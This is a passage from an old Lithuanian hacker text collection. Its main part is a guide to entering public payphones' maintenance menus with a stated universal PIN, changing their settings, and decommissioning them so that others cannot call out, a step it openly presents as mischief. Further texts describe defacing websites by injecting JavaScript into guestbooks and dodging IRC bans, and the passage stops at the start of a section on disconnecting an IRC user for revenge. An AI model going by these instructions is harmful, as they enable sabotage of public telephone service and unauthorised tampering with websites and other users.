LCD monitoriuje *stipriai* pakelus apatini-kairiji taksofono kampa.
Ishtikruju jis turi pasiridyti atidarius taksofona specialiuoju raktu,
bet pakelus taksofono kampa mes emuliuojame jo atidaryma.
[PIN CODE ? : ]
[ ]
Pin kodas yra keturiu skaitmenu ir dabar visoje Lietuvoje galiojantis pin
kodas yra 3707.
Noredami ieiti i meniu surenkame:
{3707}
Ivedant pin koda, skaicziu ekrane nesimato, juos atstoja simbolis ‘*’:
[PIN CODE ? : *** ]
[ ]
Ivedus pin koda, ekrane pasirodo pirmoji meniu opcija
(opcija – meniu punktas):
[SETTINGS ]
[ ]
Taksofono meniu yra valdomas taksofono mygtuku pagalba.
Mygtuku reikshmes:
<- 7 (i kaire: parodo sekanczia einamojo meniu opcija)
-> 9 (i desine: parodo priesh tai esanczia einamojo meniu opcija)
8 (iseiti is submeniu i aukstesnio lygio meniu)
0 (ieiti i submeniu arba keisti reiksme)
* (BACKSPACE funkcija – ishtrina paskutini ivesta skaitmeni)
# (ENTER funkcija – patvirtina pasirinktus ar ivestus duomenis )
Meniu struktura
Meniu susideda ish opciju, kurias pasirinkus ieinama i kitus submeniu
(gylesnio lygio meniu), parodoma tam tikra informacija arba atliekamos
tam tikros operacijos.
Pagrindinis meniu
Pagrindinis meniu turi 6 opcijas, kurios pasirenkamos klavishais {7} arba {9}
Sekanti opcija pasirenkama klavishu {9}, priesh tai buvusi – {7}.
Pagrindinio meniu opcijos:
[SETTINGS ]
[ ]
parametru meniu
[COMMISSIONING ]
[ ]
prijungimo prie tinklo meniu
[DECOMMISSIONING ]
[ ]
atjungimo nuo tinklo meniu
[MAINTENANCE ]
[ ]
informacija ir testavimas
[CHANGE BATTERY ]
[ ]
bateriju keitimas
[SOFT INFOS ]
[ ]
skambucziu statistika
I kiekviena opcija ieinama paspaudus klavisha {0}, o isheinama i aukshtesnio
lygio meniu (shiuo atveju – pagrindini meniu) paspaudus klavisha {8}
1. Opcija SETTINGS (parametru meniu)
Iejus i shia opcija {0} galima matyti ir keisti kai kuriuos taksofono
parametrus. Virshutineje eiluteje rodomas parametro pavadinimas, o
apatineje – einamoji parametro reikshme, kuria galima keisti. Parametrai
pasirenkami klavishais {9} arba {7}. Parametru reikshmes keicziamos taip pat
klavishu {0}
Parametrai:
1.1 DIAL MODE parametras – nustato numerio rinkimo buda ir gali buti:
[DIAL MODE : ]
[LDD (PULSE) ]
pulsinis rinkimas
arba
[DIAL MODE : ]
[MFD (DTMF) ]
toninis rinkimas
1.2 CHARGING MODE parametras – nustato pokalbio apmokestinimo buda ir gali
buti:
[CHARGING MODE : ]
[TARIF TABLE ]
pagal tarifu lentele
arba
[CHARGING MODE : ]
[METER PULSES ]
skaicziuojant pulsus
1.3 CALL START CRITERIA parametras – nustato pokalbio pradzhios pozhymi ir
gali buti:
[CALL START CRITERIA:]
[POLARITY REVERSAL ]
poliarishkumo pasikeitimas
arba
[CALL START CRITERIA:]
[METER PULSES ]
skaicziuojant pulsus
1.4 INCOMING CALLS parametras – nustato ar leisti ieinanczius skambuczius
ir gali buti:
[INCOMING CALLS ]
[ALLOWED ]
i taksofona paskambunti galima
arba
[INCOMING CALLS ]
[NOT ALLOWED ]
i taksofona paskambinti negalima.
1.5 DEFAULT LANGUAGE parametras – nustato pagrindine taksofono tarnybiniu
praneshimu kalba ir gali buti:
[DEFAULT LANGUAGE : ]
[LITHUANIAN ]
lietuviu
arba
[DEFAULT LANGUAGE : ]
[ENGLISH ]
anglu
Nepaisant shio parametro, pats meniu visada bus rodomas anglu kalba.
1.6 LINE CURRENT parametras:
[LINE CURENT : 37mA ] – tel. linijos sroves stiprumas mikroamperais
[BATTERY TO PLUG: YES] – parodo, ar galimas maitinimas nuo bateriju
Shio parametro negalima keisti ir jis yra informacinio pobudzhio
1.7 – 1.10 Garso parametrai decibelais:
1.7
[MICRO GAIN DELTA : ] – mikrofono
[ 0 dB ]
1.8
[DTMF GAIN DELTA : ] – toninio rinkimo
[ 0 dB ]
1.9
[MODEM GAIN DELTA : ] – modemo
[ 0 dB ]
1.10
[EARPHONE GAIN DELTA:] – ausines
[ 0 dB ]
Shiuos parametrus galima keisti klavishais {NEXT CALL} – padidinti ir
{NEXT CARD} – sumazhinti.
NEXT CALL klavishas – treczias ish virshaus kaireje eileje
NEXT CARD klavishas – apatinis kaireje eileje
2.Opcija COMMISSIONING – taksofono ijungimo i tinkla parametrai:
2.1.PAYPHONE ID parametras – numeris, kuriuo shis taksofonas figuruoja
tinkle.
[PAYPHONE ID : ]
[27320914 # ]
Kauno apskrityje shis numeris yra ir taksofono telefono numeris:
27 – Kauno kodas, 320914 – numeris
Vilniuje taksofono numeracija kiek kitokia
2.2.REMAS PHONE NUMBER parametras – stoties, kuri aptarnauja shi
taksofonu tinkla telefono numeris. Juo taksofonas susisiekia su stotimi
vykdant ijungimo i tinkla ar ishjungimo ish tinklo funkcijas
[REMAS PHONE NUMBER:]
[360660 ]
Shiaip paskambinus shiuo numeriu ishgirsite modemo tona.
2.3.COMMISSIONING meniu punktas vykdo taksofono ijungimo i tinkla
funkcija
[COMMISSIONING (#) ]
[ ]
Funkcijos ivykdymui reikia paspausti {#}. Ekrane pasirodo uzhrashas
[COMMISSIONING ]
[IN PROGRESS. ]
ir ragelyje girdisi kaip taksofonas renka REMAS numeri ir paskui
modemas perduoda informacija
3.Opcija DECOMMISSIONING – taksofono ishjungimas ish tinklo. Iejus i ja
matome tik viena meniu punkta:
3.1. DECOMMISSIONING meniu punktas – vykdo taksofono ishjungimo ish tinklo
funkcija
[DECOMMISSIONING(#)]
[ ]
Funkcijos ivykdymui reikia paspausti {#}. Funkcija veikia analogishkai
COMMISSIONING funkcijai, tik informacijos perdavimas vyksta trumpiau.
4.Opcija MAINTENANCE – informacija ir testavimas
Punktai:
4.1.SOFTWARE RELEASE
VXX.XX # (02.07)
4.2.PARAMETERS
VXX.XX # (00.01)
4.3.CARDS ACCEPTANCE
VXX.XX # (01.11)
4.4.CALL CATEGORIES
VXX.XX # (01.36)
4.5.TT INT. NUMBERS
VXX.XX # (01.36)
4.6.TT NAT. NUMBERS
VXX.XX # (01.36)
4.7.TT DAYS
VXX.XX # (01.36)
4.8.TT SCHEDULES
VXX.XX # (01.36)
4.9.TT TARIFFS
VXX.XX # (01.36)
4.10.TT MEANS OF PAYMENT
VXX.XX # (00.00)
Parodo taksofono programines irangos versiju numerius. Shiu parametru ish
klaviaturos pakeisti negalima.
4.11.DATE/TIME punktas – parodo einanczia data ir laika:
[DATE : 99/05/31 ] – data
[TIME : 09:11:23 ] – laikas
4.12.- 4.20 punktai – Taksofono testai
4.12
<-
[? ? ? ? ? ? ? ? ? ? ]
[ ? ? ? ? ? ? ? ? ? ?]
LCD ekrano testas
4.13
->
[ ? ? ? ? ? ? ? ? ? ?]
[? ? ? ? ? ? ? ? ? ? ]
4.14 Ragelio testas – Taksofonas patikrina ragelio veikima.
4.15 Mygtuku testas
[PUSH KEY 1 ] Analogishkai patikrinami visi mygtukai
[ ]
po kurio pasirodo uzhrashas
[PAYPHONE COMPARTMENT]
[ACCESS(39) ]
4.16 Korteles testas
[INSERT A CHIP CARD ]
[THEN PRESS # ]
Ikishus kortele ir paspaudus {#} pamatome uzhtasha
[DEBIT ONE UNIT (#) ]
[ ]
Dabar paspaudus {#} taksofonas nuims nuo korteles viena kredita
4.17. Kalibravimas.
[INSERT A CHIP CARD ]
[START CALIBRATION(#)]
Idejus kortele ir paspaudus {#} taksofonas atlieka kalibravima
4.18. ANTIWIRING’o testas , reikalinga “WIRE” kortele.
[INSERT A WIRE CARD ]
[TEST ANTIWIRING (#)]
Paspaudus {#} taksofonas atlieka testa.
4.18. Slotu Testas – patikrina lizdus ishpletimo blokams
Testas atliekamas automatishkai:
[SMTEST ]
[IN PROGRESS. ]
o atlikus testa pasirodo rezultatai:
[SLOT1 : SM 6506 ] – pirmame lizde modulis 6506
[SLOT2 : BAD SM ] – antras lizdas tushczias
4.19. Ryshio su telefono stotimi patikrinimas:
[REMAS CONNECTION ]
[ ]
Paspaudus {#} taksofonas renka REMAS numeri ir ragelije girdimi modemo garsai
[CONNECTION ]
[IN PROGRESS. ]
sekmingai atlikus shi testa pasirodo uzhrashas
[SUCCESFUL TRANSMIS.]
[ ]
5. Opcija BATTERY CHANGE – skirta bateriju pakeitimui ir turi tik viena
punkta:
[CHANGE THE BATTERY ]
[THEN PRESS # ]
6.Opcija SOFT INFOS – skambucziu statistika.
Siame skyriuje issaugoma 30 (00-29) is taksofono rinktu numeriu.
Kartu issaugojama data ir laikas. Pvz:
[(00) 0 X 02000002 ]
[ 05/15 17:58 ]
Turekite omeny, kad telefono numeriai saugomi ne deshimtainiu formatu,
o greicziausia sheshioliktainiu, tixliai nezhinau, neturejau laiko
nagrineti, kol rashiau shi trumpa failiuka, tad jums teks patiems tai
ishsiaishkinti 🙂
Ishejimui ish meniu reikia isheiti ish submeniu i pagrendini meniu klavisho
{8} pagalba, pagrindiniame meniu taip pat paspausti {8} ir pasirodzhius
uzhklausimui, ar jus tikrai norite isheiti,
[EXIT FROM THE ]
[LOCAL MAINTENANCE? ]
patvirtinti savo pasirinkima klavishu {#}.
Pasirodzhius praneshimui
[HANG UP, CLOSE THE ]
[DOOR AND REMOVE CARD]
padeti rageli.
O dabar, kaip tuo pasinaudoti praktishkai?
Pvz.1:
Jus stovite Kaune, Laisves alejoje ir jums zhutbut reikia aptarti viena
reikala su draugeliu, kuris dabar yra namuose, jusu mobiliako akumas
nusedes, o taksofono korteleje liko tik vienas kreditas.
Isheitis – tegul jusu draugelis perskambina jums i taksofona.
Bet Laisves alejoje nei ant vieno taksofono nera uzhrashytas jo numeris,
o dauguma Kauno taksofonu neleidzhia i juos paskambinti.
Taigi, jus einate prie artimiausio taksofono. Jums reikia suzhinoti jo numeri
ir atblokuoti ieinancziojo ryshi funkcija:
1.) Pakeliate kairiji taksofono kampa ir matote pin kodo uzhklausima
[PIN CODE ? : ]
[ ]
2.) Ivedate pin koda: {3707} ir matote pirmaja opcija:
[SETTINGS ]
[ ]
3.) Ieinate i submeniu paspaudus klavisha {0} ir matote submeniu punkta:
[DIAL MODE : ]
[MFD (DTMF) ] – czia gali buti ir PULSE uzhrashas
4.) “Prasukate” meniu su klavishu {9} per 3 punktus (spaudzhiate ji 3 kartus)
kol ekrane pasirodys meniu punktas
[INCOMING CALLS ]
[NOT ALLOWED ]
5.) Pakeicziate shi parametra paspaude klavisha {0} ir matote:
[INCOMING CALLS ]
[ALLOWED ]
Dabar i shi taksofona galima paskambinti. Jeigu parametras ALLOWED
jau buvo nustatytas jums iejus i shi meniu punkta, vadinasi jums
pasiseke ir nieko czia keisti nereikia . Abiem atvejais, isheiname i
pagrindini meniu klavishu {8} ir vel matome opcija
[SETTINGS ]
[ ]
6.) “Prasukate” pagrindini meniu su klavishu {9} viena karta, kol ekrane
pasirodo opcija
[COMMISSIONING ]
[ ]
Ieinate i ja su klavishu {0} ir ishkart matote parametra
[PAYPHONE ID : ]
[27320914 # ]
Taigi, czia ir yra taksofono telefono numeris, kur 27 – Kauno kodas,
o 320914 – numeris.
7.) Isheinate i pagrindini meniu paspaude {8}, vel spaudzhiate {8}.
ir pasirodzhius uzhklausimui, ar jus tikrai norite isheiti,
[EXIT FROM THE ]
[LOCAL MAINTENANCE? ]
patvirtinkite savo pasirinkima klavishu {#}.
Pasirodzhius praneshimui
[HANG UP, CLOSE THE ]
[DOOR AND REMOVE CARD]
padekite rageli. Dabar su jusu vieninteliu kreditu skambinate savo
draugeliui ir prashote, kad perskambintu telefonu, kuri jus matete ekrane
(musu pavizdyje – 320914, arba jeigu jusu draugelis yra kitame mieste –
8-27-320914) ir padeje rageli laukiate skambuczio. Suskambejus taksofonui,
pakeliate rageli ir kalbates 🙂 Jusu pokalbio metu ekranas atrodys taip:
[IEINANTIS RYSYS ]
[ ]
o jusu draugeliui uzh pokalbi teks moketi tiek pat, kiek skambinant iprastu
telefono numeriu.
Pvz.2:
Jums ish chuliganishku ar kitokiu paskatu reikia, kad niekas ishskirus jus
negaletu paskambinti ish tam tikro taksofono :). Jums tereikia atjugti shi
taksofona nuo tinklo (kitais zhodzhiais – uzhblokuoti ji):
1.) Ieinate i taksofono meniu kaip nurodyta pirmame pavizdyje ir ishsirenkate
opcija
[DECOMMISSIONING ]
[ ]
2.) Ieinate i ja su klavishu {0} ir pamate
[DECOMMISSIONING (#)]
[ ]
Spaudzhiate {#}. Ragelyje girdisi, kaip taksofonas renka REMAS numeri ir
modemu perduoda informacija. Tuo metu ekrane matote
[DECOMMISSIONING ]
[IN PROGRESS. ]
Kai taksofonas baigia informacijos perdavima, ekrane pasirodo:
[DECOMMISSIONING ]
[OK ]
3.) Dabar jus galite isheiti ish meniu kaip nurodyta pirmame pavizdyje ir
padeti rageli. Po to, kai jus atjungete taksofona nuo tinklo, bet kas,
norintis paskambinti ish shio taksofono matys ekrane uzhrasha
[TIK SPEC. TARNYBU ]
[NUMERIAI ]
ir negales paskambinit jokiu numeriu ishskirus 01, 02, 03, 04 🙂
Noredami patys paskambinti, jus turesite vel ijungti shi taksofona i tinkla:
1.) Ieinate i taksofono meniu ir pasirenkate opcija
[COMMISSIONING ]
[ ]
2.) Ieinate i ja klavishu {0} , prasukate meniu su {9} kol ekrane pasirodys
punktas
[COMMISSIONING (#) ]
[ ]
ir paspaudzhiate {#}. Ragelyje girdisi, kaip taksofonas renka REMAS numeri
ir modemu perduoda informacija. Tuo metu ekrane matote:
[COMMISSIONING ]
[IN PROGRESS. ]
Informacijos perdavimas gali uzhtrukti keleta minicziu, o kai baigiasi,
ekrane matome
[COMMISSIONING ]
[OK ]
Taksofonas ijungtas i tinkla 🙂
Jeigu kazhkas netvarkoj (pvz. klaidingai nustatyti taksofono parametrai)
arba informacijos perdavimas nepavyko, pasirodo uzhrashas
[COMMISSIONING ]
[NOT OK ]
Tada nustatykite tinkamus parametrus ir bandykite dar karta.
3.) Sekmingai atlike prijungimo funkcija, isheikite ish meniu kaip nurodyta
pirmame pvz. ir padekite rageli. Dabar galite skambinti.
Na ir dar vienas patarimas priesh pabaiga – butu nebloga ideja, priesh
zhaidzhiant su taksofono meniu, nusirashyti, kaip buvo nustatyti visi
kintami parametrai, kad prireikus juos butu galima atstatyti. Mes juk
nenorime, kad mieste neliktu nei vieno veikianczio taksofono 🙂
PABAIGOS ZHODIS: Prie viso to reiktu pazhymeti, kad ash asmenishkai nesu
telefonistas o czia pateikta informacija gauta praktiniu bandymu budu,
todel gali pasitaikyti netikslumu ar neaishkumu.
Jeigu jus turite kokiu nors pastebejimu ar galite pridurti ka nors daugiau,
jusu komentarai ir pasiulymai visada laukiami. Su manimi galite susisiekti
adresu: ww0lf@pogrindis.net
Knowledge is power!
ww0lf
-Pabaiga-
eof
17. Ouestbook hack
Puslapio hakinimas per guestbook’a Shtai dar vienas budas nuhakinti web puslapius! Taip buvo nuhakintas ir jaunimas.net ir daug kitu. Kai kurie rimtesni saitai turi apsauga nuo to bet daugumas tiesiog palieka likimo valiai! Tai va zhodziu viska ka tau reikia padaryti tai nueiti i ta puslapi su guest book’u ir parashyti vietoje tavo : “Sveiki man labai patiko jusu puslapis ir t.t.” 🙂 turiu omeni atsilepimu skiltie ar panashiai rashai tiesiog JavaScripta ir nieko daugiau > gali padaryti nuoroda i puslapi ir pan. Tai va zhodzhiu veikimo prinsipas yra toks kad kai irashai guestbooko teksta jis tiesiogiai ji irasho i savo html > nu jei html tai html tu jam duodi Java scripta ir viskas :))) Shtai keli java scripto pavyzdzhiai: Shi funkcija ishmes langeli su OK knopke kurioje bus tekstas : “HAc|{eD By Craft[Eye]” O shis paklaus ar tau 18 metu ir nuves i tam tikra puslapi 🙂 Na tai tiek 🙂 Kaip ash visada sakau Happy Hacking! Craft[Eye] – CraftEye@gmx.net
18. Hackeriai prieš crackerius
Kas yra hackeris?
Hackeris- jis turi išmanyti kompiuteryje.
Turi mokėti programuoti,nes be programavimo nelabai ką ir pahakins
Turi mokėti kalbas anglu ir rusu.
Neskubėti,visus savo veiksmus gerai apgalvoti.
Daug atiduoti pinigu už ineta 🙂
Niekada neturi galvoti, kad kas nors žino už jį daugiau ar mažiau, turi galvoti, kad žino mažiausiai ir reikia tobulintis.
Kuo skiriasi hackeris nuo Crackerio?
Hackeris – žmogus,kuris domisi įvairiomis operacinėmis sistemomis,
jų klaidomis,dažnai programuotojas.
Hackeriai dažnai sugalvoja būdus kaip įsilaužti,dažnai jie gerai išmano
technika.
Jie žino sistemos skyles ir ieško nauju.
Crackeris yra žmogus kuris daug išmanydamas apie “ineta”, ir tinklus griauna
apsaugos sistemas.Tai būdavo žmogus iššifruojantis užkoduota infa.
bet dabar Crackeriai įsilaužinėja į kitus kompus,su skirtingais tikslais:
Prisijunkti,sunaikinti infa, perskaityti ją, gauti passwordus ir t.t
Hackeriai dažnai naudojasi Crackeriu sukurtomis programomis,
Kad patikrintų tinklo saugumą ir t.t
Skirtumas yra toks,kad viskas ką crackeriai daro yra nelegalu.
Crackeriai niekada neišnyks, nes juk jau tokia žmogaus prigimtis naikinti viską kas sukurta.
Skeletaz
2000
19. Internet Hack
Lapkritis ‘Y2K
~23:00 val.
–
Kadangi esu tik begineriz(o gal tik sumautaz lameriz), taj kol kas mano txt’aj
informaciniaj.. na galbut atejz lajkaz, ir me sukurpz ka norz ql. na bet kol
kas tenkisnimes ir tuo. Tajp kad shis txt yra TIK informaciniz.. ajshq kajp
ir visi kiti :))
–
Hi, na taj kajp ejnasi?. oj, ne apie taj juk ash turechiau.. ajshq dabar
kajp visada nuo CraftEye gausiu pzd. kad kol isivazhiuoju nesamoniu priplepu
ir vis apie alu varau.. ;]] oky oky.. No alko now.. jau buvo diena alko dabar
ne.. :)) o dabar nesimiega.. yra chrustiq ir kavoz..na taj apie ka ten mes.. o
tajp apie Internet’a .. hmmm. o kas taj yra. gal su uogiene taj kramtoma..
Patiko chia presh kokiuz metuz kazhkokia radijos stotiz uzhdavine klausyma:
“Kas yra Internetas”.. oj tada taj prisiklausiaj visokiu sapaliojimu.Apie taj
kad I’netaz, taj begalo DIDELIZ ir galingas kompiuteris, arba kad taj
palydovas.. 🙂 Na manau, per metuz liaudiz jau daugiau apie taj suzhinojo.
So just read. sorry, kad be lietuvybez, dar nesusikonfiguravau
mandrake’o.
—————————————————–
Internet[pagal A.Petrovskij, B. Leontjev “Efektinvnij haking”]
***
Internet’az – taj didzhiausiaz kompiuteriniz tinklaz pasaulyje jungiantis
begalo daug kompiuteriu ivajriausiajz metodajz nuo telefoniniu liniju iki
palydovinio ryshio sistemu. Internet’e naudojamas protokolas TCP/IP, qriz
savyje turi”
# IP(Internet protokol) – tarptinklinis protokolaz, kuris prizhiuri
transliacija be jokiu papildomo tvarkymo perduodant duomenis ish vieno
ompiuterio kitam.
# UDP(User Datagram Protocol) – vartojishkas datagram’inis protokolas,
aptarnaujantis transliacija atskiru praneshimu, IP pagalba, be klaidu
tikrinimo.
#TCP(Transmissin Control Protocol) – perdavima kontroliuojantis protokolas,
aptarnaujantis transliacija IP pagalba tikrinantis susijungima.
Kiekvienas kompiuteriz , prijungtas prie I’neto gauna savo IP adresa.
Iternet’o adresa yra 4 bajtu dydzhio ir susideda ish dvieju daliu: tinklo ir
kompiuterio. Pirma dalis rejshkia logini tinkla, kuriam paskirtas adresas.
Antra dalis identifikuoja konkriachiaj ta kompiuteri tinkle.
Pagal susitarima, IP adresas yra ish skaijchiu ishkirtu tashkajz.pvz:
196.219.31.12
~~DNS~~
DNS(Domain Name System) – taj duomenu base, qri lajko informacija apie
kompiuteriuz,qrie yra ijungti i I’neta. Duomenu tipas priklauso nuo
kompiuterio, bet dazhniausiai taj IP adresas ir duomenys marshrutizacijaj.
Patogumo delej, daugelis kompiuteriu turi savo vardus, pvz:
Jonas, Petryte.. just jokin’ :)))
DNS vykdo keleta uzhduochiu, bet pagrindine jos uzhduotis pertvarkyti
kompiuteriu vardus i IP ir atgal. DNS erdve atrodo kajp domenu medis,
artejanchiajz prie medzhio shaknu. Medshio shaknys turi varda, po ja ejna
domenaj aukshtesnio lajpsnio(shakniez domenaj). Egzituoja dvi rushys
aukshto lajpsnio domenaj. USA aukshchiausio vajzduoja arganizacijos struktura.
Ir kajp tajsykle turi triju rajdzhiu varduz:
# .gov – valdzhios istajgoz
# .mil – karines istajgoz
# .com – komercines organizacijos
# .net – tinklo paslaugu tiekejaj
# .org – Ne pelno siekenchios organizacijos
# .edu – moxlo istajgoz
Del domenu uzh USA ribu susijusiu su teritorijos pasiskirstimu naudojami vardaj
ish dvieju rajdzhiu. pvz:
hakeriai.voras.lt – Lietuvoje(kazhi apie ka chia?:)
www.porno.ru – Rusija (geraz sajtaz beje 🙂
~~~Darbaz I’nete~~~
Na ajshq jej turi I’net’a taj ir gali kazhka jame daryti, tam yra rejkalingos
programoz, shtaj keletaz ish ju:
# ping – lejdzhia nustatyti lajka paketo nuejimo iki hosto. [kazhqr girdejau
kad ne vien tam pinginimaz yra naudojamz :]
# traceroute – parodo praejnanchiu paketu kelia kelia tinkle(Sux95 ir SuxNT –
tracert.exe)
# nslookup – lejdzhia perzhiureti DNS serveriu palajkima
# telnet – Nustato sujusijungima su nutolusiu kompiuteriu(23 portas) ir
lejdzhia dirbti nutolusio terminalo rezhime
# ftp – lejdzhia kejstis fajlajz naudojant FTP(File Transfer Protocol)
protokola(21 portas)
# finger – parodo informacija apie vartotojus dirbanchius tinkle.
Darbuj su WWW(World Wide Web) naudojamos programos Netscape Navigator vs
Internet Explorer, etc. Shioz programoz jungiasi su serveriu(80 portas) ir
dirba su protokolu HTTP.
————————————————
Na ka ir viskaz.. shiaj nakchiaj tiek. dabar tex sustot su txt. linux’u ir
viskuo kitu :((( Ne ne ne vyrukaj su juodajz drabuzhiajz beldzhiasi i duriz,
bet arteja, ne ne ir ne apokalipse. o sumauta sesija. ech. na o po to
palajma – 4T0$T0G0Z.. what’z ql.. .bu lajko viskam, i think so..
————————————————
Shi txt galima lajsvaj platinti, bet NIEKO nekejsti.
Kadangi tikraj nemanau, kad shis txt yra idealuz, taj laukiu patajsymu ir
klajdu tajsymu, bej pasiulymu y-majl: j-azz@centras.lt
================================================================
J-azz
#Ne, ash – ne hackeriz, tiesiog blogai miegojau.#
20. Keletas irc pamokėlių
ノヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘサ
コ . keletas IRC pamokeliu by mr2 . コ
ネヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘヘシ
“Communications without intelligence is noise;
Intelligence without communications is irrelevant.”
ノトトトトトトトトトトトトトトトトトサ
ウ <<< turinys >>> ウ
ネトトトトトトトトトトトトトトトトトシ
レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ
ウ [[1]] tau uzdejo bana . o tau nors verk reikia ウ
ウ patekt i ta kanala 😉 ウ
ウ [[2]] hmm . neturiu jokio *IRC (nej mIRC . ウ
ウ nej pIRC . zodziu jokio) o tajp nera laiko ウ
ウ ji parsisiust ir tajp reikia pasikalbet ;((( ウ
ウ [[3]] kaip pasidaryti savo script ? (trumpai) ウ
ウ [[4]] chiuvakas kaska negero pasake ? nori kersto ? ウ
ウ atjungiam chiuwaka ? (ir kajp nuo to paciam ウ
ウ apsisaugot) ウ
ウ [[5]] lameriska instrukcija TAKEOVERINKUJ 😉 ウ
タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル
ノトトトトトトトトトトトトトトトトトサ
ウ <<< textas >>> ウ
ネトトトトトトトトトトトトトトトトトシ
レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ
ウ [[1]] tau uzdejo bana . o tau nors verk reikia ウ
ウ patekt i ta kanala 😉 ウ
タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル
reikalas tame kad kartais (shiaip apie 30% atveju
(gal biski daugiau . gal maziau)) jei jums
kokiame taj kanle uzdejo bana . norint patekt
i ta kanla uztenka :
1) pasikeist nick’a arba .
2) Options/Connect/Identd/ . User ID: langelyje
pakeist UserId duomenis . (kad suveiktu reikia
diskonektintis ir vel konektintis) jei nepavyko
lieka trechias (tikraj nepaskutinis) .
3) (sis galima sakyt ish 2-ju daliu susidarantis
punktas priklauso dazniausiaj nuo to ka jus
prisidirbot tame kanale) reiskias parasot
“/names [#kanalo pavadinimas]” paziurit nick’us
su op’ais (priesajs nick’a @ pvz : @agurkaz) ir
paprasot jo nuimt bana . pvz :
“/msg agurkaz plz nuimk bana [#kanalo_pav] kanale
arba “/notice [#kanalas] nuimkit bana or smth”
(shiuo atveju zhinute gaus visi esantys kanale)
o kitas varijantas : jei kanalas kuriame gavot +b
sedi nedidelis skaicius zmoniu . taj paprastaj
nepraeina neij pora minuciu kaip nuimamas
banas . nes tokiuose kanaluose paprasciausiai
reikalinga liaudis kad ir kokia ji bebutu .
tam kad ten sedetu (rkp belaukian ar dar del kokiunors
kitu priezasciu) . 😉
(beabejo galima pasinaudoti proxi servu paslaugom .
bet apie taj chia nerashysiu (ir tajp jau daug kas
yra prirase apie proxius .))
レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ
ウ [[2]] hmm . neturiu jokio *IRC (nej mIRC . ウ
ウ nej pIRC . zodziu jokio) o tajp nera laiko ウ
ウ ji parsisiust ir tajp reikia pasikalbet ;((( ウ
タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル
kagi tokiu atveju daryt ? ogi tu kaijp speju sedi
prie windozes ? 😉 taj kokios problemos ? spaudi
start/run (arba win_klavisa+r) ir i langeli irashaj
“telnet” be ->”<- . (reiketu nueit i
terminal/preferences ir nusistatyt telnet’a . bet
shikart ne apie taj . padarysit taj ir be mano
pagalbos) tajgi pagrindiniam lange spaudi
connect/remote system . ir chia pvz :
host name : irc.omnitel.net
port : 6667
term type : vt100
spaudi connect . ir lauki kol pagrindiniam lange
vietoj “(none)” musu atveju pamatysi :
“irc.omnitel.net” . tada rasaj “user a a a a”
butinaj 4-ri (dabar neaiskinsiu kas taj) [enter]
tada rashaij “nick [jusu nick’as]” [enter] .
tada laukiat kol servas ishmes “ping [ir chia kaskox
skaicius]” . toliau rasai “pong [chia rasaij ta
skaiciu kuri gavaj ish servo]” . ir jus jau
prisijunge 😉 . toliau galit rasyt jau iprastas
komandas kaip “join #mr2” (taip . taip . chia
komandos rasomos be “/”) . tiesa jus susidursit
su viena problemele : chia norink kaska pasakyt pvz :
i kanala #mr2 reikia rasyt “privmsg #mr2 [jusu zinute]”
(patarciau parasyt “help” [enter] ir paziuret visas
komandas . nes kajp jau supratot nevisos komandos
tokios pacios kajp pvz: mIRC’e . (zodziu kas iesko
. tas randa) na o sedintiems po *NIX sistema manau
nebus sunku padaryti tapati 😉
レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ
ウ [[3]] kaip pasidaryti savo script ? (trumpai) ウ
タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル
taip taip taip . patikekit manim yra zymiai
maloniau tureti savo paties parasyta script (kaj
zinaj smulkiausias jo ipatybes) nej pasikliauti gana
daznaj backdorus turinchiais skriptajs . (shiaip
man neteko su tokiu script turet reikalu . bet ju
yra .) tiesiog parsisiuskit ircintro.hlp bei
mirc.hlp . (shie helpaj paprastaj buna kartu su
pachiu mIRC’u) na dar galite parsisiust numeric.hlp
. kurio praktiskaj neprireiks pradedanchiam
skript-kiddie . taj pradziai . toliau kaij suprasit
pagrindus patarciau parsisiusti keleta jau padarytu
skriptu . addon’u pvz : ish www.mircscripts.com .
www.mircx.com . ir dar dauk panasiu saijtu .
neslepsiu kad didele dali agurkaz-script parasiau
zvilkteledamas i kitu skriptus . pvz : “warmaster”
(savo laiku pac geriausias . nors jau pasenes yra
daug zmoniu visdar ji naudojanciu) . tiesa i savo
script neidejau ji ishgarsinusio TAKEOVER . shiaip
del kurio yra teke matyt autobana gaunanciu chiuvaku
bandanciu uzeijt i viena ar kita kanala . (vien
delto kad naudoja warmaster’i) . ir begale kitu
naujesniu ir netgi senesniu (juose kartajs net
lengviau susigaudyt nej naujuosiuose .) skriptu
kaip “matrix” “stigmata” ir t.t. (tiesa nepatariu
siustis didelia apimti uzimanciu skriptu nes juose
paprastaj be *.waw *.mp3 failiuku nieko gero ir
nera . (atejtyje galbut parasysiu ir detalesni
script’u darymo tutorial’a (na jej bus norinciu))
レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ
ウ [[4]] chiuvakas kaska negero pasake ? nori kersto ? ウ
ウ atjungiam chiuwaka ? (ir kajp nuo to paciam ウ
ウ apsisaugot) ウ
タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル
shiaip tokiaijs dalykajs nepatariu uzsiiminet .
taj yra lameriska . bet kartais buna tokiu atveju
kaj buna px ant wisko ir tiesiog norisi pamokyt
chiuwaka . tokiu atveju pirma ka reikia padaryti
priesh karo veiksmus taj ishsiaiskint ant kiek tas
chiuvax kietas . darom “/ctcp [chiuvako nick] version”
